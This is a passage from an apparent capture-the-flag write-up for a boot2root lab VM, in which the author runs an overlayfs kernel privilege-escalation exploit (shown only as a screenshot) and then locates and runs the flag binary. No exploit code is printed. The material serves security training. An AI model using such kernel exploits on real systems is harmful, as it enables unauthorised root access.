<p>I decided to start with the exact kernel version exploit since this one in particular came up and because it is overlayfs which is a very common vulnerability that I have successfully used on many linux machines.  If it doesn‚Äôt work I can move on to the others.</p>

<p><b>Copied the exploit to the system, compiled, and ran it</b>
<img src="{{ site.url }}/assets/img/ctf/6days_lab_5.png" /></p>

<p><b>So, on the first exploit pulled down it works‚Ä¶</b></p>

<p><b>Locating flag file</b></p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
</pre></td><td class="rouge-code"><pre># find / -name *flag*
find / -name *flag*
/flag
# file /flag
file /flag
/flag: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x1c1ab047fe9e780a761aade9bc9b22efe3a9765b, not stripped
# /flag
/flag


  _________ _____  __  ______  __  ______ _      ______    ____ ___  ___
 / ___/ __ `/ __ \/ / / / __ \/ / / / __ \ | /| / / __ \  / __ `__ \/ _ \
/ /__/ /_/ / / / / /_/ / /_/ / /_/ / /_/ / |/ |/ / / / / / / / / / /  __/
\___/\__,_/_/ /_/\__, /\____/\__,_/ .___/|__/|__/_/ /_(_)_/ /_/ /_/\___/
                /____/           /_/


        Author: @1ce7ea


	Congratulations on successfully completing our boot2root vm!
	Please consider visiting our website and following us on Twitter.
	And please provide feedback. I hope you enjoyed it :)

	Website: http://canyoupwn.me/
	Twitter: https://twitter.com/canyoupwnme
	Author: https://twitter.com/1ce7ea
</pre></td></tr></tbody></table></code></pre></div></div>
:ET